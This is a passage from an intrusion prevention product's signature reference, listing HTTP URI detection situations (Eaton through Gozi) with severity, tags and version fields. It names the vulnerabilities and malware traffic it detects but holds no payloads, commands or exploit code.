About this situation: A vulnerability in Eaton Network Shutdown Module
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton Network Shutdown Module, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Eaton-Shutdown-Module-DoS
Description:
Back to top

HTTP_CSU-Ebates-Moneymaker

About this situation: Ebates MoneyMaker activity detected.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Ebates-Moneymaker
Description:
Back to top

HTTP_CSU-Ecava-IntegraXOR-CVE-2014-0753

About this situation: A vulnerability in Ecava IntegraXor
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, IntegraXOR, CVE2014, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Ecava-IntegraXOR-DoS-CVE-2014-0753
Description:
Back to top

HTTP_CSU-Elastic-ElasticSearch-Snapshot-API-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Elastic Elasticsearch detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ElasticSearch, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-990-5242
Last changed: sgpkg-ips-990-5242
Vulnerability: Elastic-ElasticSearch-Snapshot-API-Directory-Traversal
Description:
Back to top

HTTP_CSU-Elastic-Kibana-Server.js-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Elastic Kibana detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ElasticSearch, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Elastic-Kibana-Server.js-Local-File-Inclusion
Description:
Back to top

HTTP_CSU-ElasticSearch-File-Discosure

About this situation: An attempt to exploit an ElasticSearch File Discosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ElasticSearch, CVE2015, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1640-5242
Vulnerability: ElasticSearch-File-Discosure
Description:
Back to top

HTTP_CSU-EMC-Cmcne-Inmservlets-CSV-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in EMC Connectrix Manager Converged Network Edition detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, EMC Connectrix Manager, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: EMC-Cmcne-Inmservlets-CSV-Information-Disclosure
Description:
Back to top

HTTP_CSU-EMC-Cmcne-Inmservlets-Softwarefileuploadmoreinfoservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in EMC Connectrix Manager Converged Network Edition detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, EMC Connectrix Manager, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: EMC-Cmcne-Inmservlets.war-Softwarefileuploadmoreinfoservlet-Directory-Traversal
Description:
Back to top

HTTP_CSU-EMC-Cmcne-Inmservlets.war-Unifiedfileuploadmoreinfoservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in EMC Connectrix Manager Converged Network Edition detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, EMC Connectrix Manager, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1589-5242
Vulnerability: EMC-Cmcne-Inmservlets-Unifiedfileuploadmoreinfoservlet-Directory-Traversal
Description:
Back to top

HTTP_CSU-Encoded-Crlf-Sequence

About this situation: A URI encoded CRLF-sequence detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Encoded-Crlf-Sequence
Description:
Back to top

HTTP_CSU-Enfal-Traffic

About this situation: Enfal traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Enfal-Malware
Description:
Back to top

HTTP_CSU-EnterpriseDB-Postgres-Plus-Advanced-Server-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in EnterpriseDB Postgres Plus Advanced Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, EnterpriseDB Postgres Plus Advanced Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: EnterpriseDB-Postgres-Plus-Advanced-Server-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Envoy-HTTP-Url-Path-Access-Control-Bypass

About this situation: An attempt to exploit a vulnerability in Envoy detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Envoy, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: Envoy-HTTP-Url-Path-Access-Control-Bypass
Description:
Back to top

HTTP_CSU-Eramba-Authenticated-Remote-Code-Execution-Module-CVE-2023-36255

About this situation: An attempt to exploit a vulnerability in Eramba detected
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Eramba, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Eramba-Authenticated-Remote-Code-Execution-Module-CVE-2023-36255
Description:
Back to top

HTTP_CSU-Ericom-AccessNow-Server-Buffer-Overflow

About this situation: Ericom AccessNow Server insecure usage of vsprintf
Context: HTTP Request URI
Severity: 7
Tags: Windows 2003 SP2, Windows XP SP3, Any Hardware, Ericom AccessNow, CVE2014, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-679-5211
Vulnerability: Ericom-AccessNow-Server-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Esf-Pfsense-Cross-Site-Scripting

About this situation: An attempt to exploit an Esf Pfsense Cross Site Scripting vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: Esf-Pfsense-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Esf-Pfsense-Snort-Snort_log_view.php-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense Snort detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-564-5211
Vulnerability: Esf-Pfsense-Snort-Snort_log_view.php-Information-Disclosure
Description:
Back to top

HTTP_CSU-Etcd-API-Stored-Keys-Disclosure

About this situation: An attempt to exploit a vulnerability in Etcd detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Etcd, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1174-5242
Vulnerability: Etcd-API-Stored-Keys-Disclosure
Description:
Back to top

HTTP_CSU-EvoLogical-EvoCam-Web-Server-Buffer-Overflow

About this situation: EvoLogical EvoCam Web Server Buffer Overflow
Context: HTTP Request URI
Severity: 7
Tags: Mac OS X, Any Hardware, EvoCam Web Server, CVE2010, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: EvoLogical-EvoCam-Web-Server-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Excessively-Long-Url

About this situation: Excessively long URL detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2005, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1432-5242
Vulnerability: HTTP-Macromedia-JRun-4-Long-Url-Buffer-Overflow
Description:
Back to top

HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-1

About this situation: Attempt to exploit a buffer overflow in Eznet HTTP server
Context: HTTP Request URI
Severity: 10
Tags: Windows, x86, eZnetwork eZ, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: EzSoftware-Eznet-Long-HTTP-Request-BOF
Description:
Back to top

HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-2

About this situation: Attempt to exploit a buffer overflow in Eznet HTTP server
Context: HTTP Request URI
Severity: 10
Tags: Windows, x86, eZnetwork eZ, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: EzSoftware-Eznet-Long-HTTP-Request-BOF
Description:
Back to top

HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-3

About this situation: Attempt to exploit a buffer overflow in Eznet HTTP server
Context: HTTP Request URI
Severity: 10
Tags: Windows, x86, eZnetwork eZ, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: EzSoftware-Eznet-Long-HTTP-Request-BOF
Description:
Back to top

HTTP_CSU-F-Secure-Policy-Manager-Information-Disclosure

About this situation: Attempt to access a vulnreable CGI application
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, F-Secure Policy Manager, CVE2004, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-404-4219
Vulnerability: F-Secure-Policy-Manager-Information-Disclosure
Description:
Back to top

HTTP_CSU-F5-Big-IP-ASM-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in F5 Big IP detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: F5-Big-IP-ASM-Stack-Based-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Fakerean-Botnet-Request

About this situation: A suspicious request have been made
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1385-5242
Vulnerability: Fakerean-Botnet
Description:
Back to top

HTTP_CSU-FANUC-OlpcPRO-Directory-Traversal

About this situation: FANUC OlpcPRO Directory Traversal Vulnerability 0-day
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, FANUC, Windows not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: FANUC-OlpcPRO-Directory-Traversal
Description:
Back to top

HTTP_CSU-File-Type-Extension-Variables

About this situation: Sets variables identifying file types
Context: HTTP Request URI
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-371-4219
Description:
Back to top

HTTP_CSU-FinalDraft-C2-Activity

About this situation: FinalDraft command-and-control traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, FinalDraft, Any Operating System not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: FinalDraft-C2-Activity
Description:
Back to top

HTTP_CSU-Flatnuke-Id-Parameter-Directory-Traversal

About this situation: Detects exploits against Flatnukes id parameter directory traversal vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Flatnuke, CVE2005, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-489-5211
Vulnerability: HTTP-Flatnuke-Id-Parameter-Directory-Traversal
Description:
Back to top

HTTP_CSU-FoggyWeb-Backdoor-C2-Traffic

About this situation: FoggyWeb command and control traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: FoggyWeb-Backdoor-C2-Traffic
Description:
Back to top

HTTP_CSU-ForgeRock-OpenAM-Jato-Java-Deserialization

About this situation: An attempt to exploit a vulnerability in ForgeRock OpenAM detected.
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, ForgeRock OpenAM, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: ForgeRock-OpenAM-Jato-Java-Deserialization
Description:
Back to top

HTTP_CSU-Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-750-5211
Vulnerability: Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading
Description:
Back to top

HTTP_CSU-Foxit-Reader-Plugin-For-Firefox-Url-String-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Foxit Reader, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: Foxit-Reader-Plugin-For-Firefox-Url-String-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CSU-FrontPage-Rad-Fp30reg-Access

About this situation: Access of 'fp30reg.dll' in FrontPage Server Extension
Context: HTTP Request URI
Severity: 7
Tags: Windows NT, Windows 2000, Any Hardware, IIS 5.0, IIS 4.0, FrontPage Server Extensions, MS2001, CVE2001, Windows NT not specific, Windows 2000 not specific, FrontPage Server Extensions not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Web-FrontPage-Rad-Reg-DLL-BOF
Description:
Back to top

HTTP_CSU-Gallery-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Gallery detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Gallery, CVE2003, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Gallery-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-GE-Mds-Pulsenet-Filedownloadservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in General Electric MDS PulseNET detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, General Electric MDS PulseNET, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: GE-Mds-Pulsenet-Filedownloadservlet-Directory-Traversal
Description:
Back to top

HTTP_CSU-General-Server-Status-Client-URI

About this situation: Partial detection for an Apache Heap Buffer Overflow correlation.
Context: HTTP Request URI
Severity: 1
Tags: Any Operating System, Any Hardware, Apache, CVE2014, Any Operating System not specific, Apache not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Apache-HTTP-Server-Mod_status-Heap-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Get-Msdos-Device-Name-DoS

About this situation: Possible Denial of Service (DoS) attack by requesting an MSDOS device name
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, Generic HTTP server, CVE2001, CVE2002, CVE2003, CVE2005, Windows not specific, Generic HTTP server not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1639-5242
Vulnerability: HTTP-Darwin-Streaming-Server-Msdos-Device-Name-DoS
Apache-HTTP-Server-Msdos-Device-Name-DoS
Analogx-SimpleServer-Msdos-Device-Name-DoS
Small-HTTP-Server-Msdos-Device-Name-DoS
Xitami-HTTP-Server-Msdos-Device-Name-DoS
Jana-HTTP-Server-Msdos-Device-Name-DoS
Cyberstop-HTTP-Server-Msdos-Device-Name-DoS
Lotus-Domino-HTTP-Server-Msdos-Device-Name-DoS
Novell-eDirectory-DOS-Device-Name-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Geutebruck-testaction-RCE

About this situation: An attempt to exploit a vulnerability in Geutebruck camera firmware detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Geutebruck, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Geutebruck-testaction-RCE
Description:
Back to top

HTTP_CSU-Ghost-CMS-Static-theme.js-Path-Traversal

About this situation: An attempt to exploit a vulnerability in Ghost Foundation Ghost detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ghost Foundation Ghost, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1686-5242
Vulnerability: Ghost-CMS-Static-theme.js-Path-Traversal
Description:
Back to top

HTTP_CSU-Gila-CMS-Image-Upload-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Gila CMS Gila detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Gila CMS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Gila-CMS-Image-Upload-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Gitlab-Branch-Search-Regex-Denial-Of-Service-CVE-2024-2878

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1751-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: Gitlab-Branch-Search-Regex-Denial-Of-Service-CVE-2024-2878
Description:
Back to top

HTTP_CSU-Gitlab-Web-IDE-Cross-Site-Scripting-CVE-2024-4835

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Gitlab-Web-IDE-Cross-Site-Scripting-CVE-2024-4835
Description:
Back to top

HTTP_CSU-Gitlist-Unauthenticated-Remote-Command-Execution

About this situation: An attempt to exploit a Gitlist Unauthenticated Remote Command Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Gitlist, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-698-5211
Vulnerability: Gitlist-Unauthenticated-Remote-Command-Execution
Description:
Back to top

HTTP_CSU-Glutton-Backdoor-HTTP-Traffic

About this situation: Glutton backdoor activity detected
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, Glutton malware, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Glutton-Backdoor-Activity
Description:
Back to top

HTTP_CSU-Go-Continuous-Delivery-Pre-Auth-Local-File-Read

About this situation: An attempt to exploit a vulnerability in GoCD Pre auth Local File Read detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Go Continuous Delivery, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Vulnerability: Go-Continuous-Delivery-Pre-Auth-Local-File-Read
Description:
Back to top

HTTP_CSU-GoAhead-Web-Server-Source-Code-Exposure

About this situation: An attempt to exploit a vulnerability in GoAhead Web Server was detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, GoAhead Webserver, CVE2002, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: GoAhead-Web-Server-Source-Code-Exposure
Description:
Back to top

HTTP_CSU-GoAhead-Webserver-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in GoAhead WebServer
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, GoAhead Webserver, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: GoAhead-Webserver-Directory-Traversal
Description:
Back to top

HTTP_CSU-GoAnywhere-MFT-Authentication-Bypass-CVE-2024-0204

About this situation: An attempt to exploit a vulnerability in Fortra GoAnywhere MFT detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, GoAnywhere MFT, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1685-5242
Last changed: sgpkg-ips-1685-5242
Vulnerability: GoAnywhere-MFT-Authentication-Bypass-CVE-2024-0204
Description:
Back to top

HTTP_CSU-Gogs-DeleteRepoFile-Internal-File-Deletion-CVE-2024-39931

About this situation: An attempt to exploit a vulnerability in Gogs
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Gogs, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Gogs-DeleteRepoFile-Internal-File-Deletion-CVE-2024-39931
Description:
Back to top

HTTP_CSU-Gogs-Git-Endpoints-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Gogs detected.
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Gogs, CVE2022, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Gogs-Git-Endpoints-Directory-Traversal
Description:
Back to top

HTTP_CSU-Golbrnd.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Backdoor.Golbrnd.A-Botnet
Description:
Back to top

HTTP_CSU-Google-Document-Embedder-Plugin-File-Disclosure

About this situation: An attempt to exploit a Google Document Embedder Plugin File Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Google Document Embedder, CVE2012, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1640-5242
Vulnerability: Google-Document-Embedder-Plugin-File-Disclosure
Description:
Back to top

HTTP_CSU-Gozi-Malware-Infection-Traffic

About this situation: Gozi malware infection traffic detected
Context: HTTP Request URI
Severity: 7
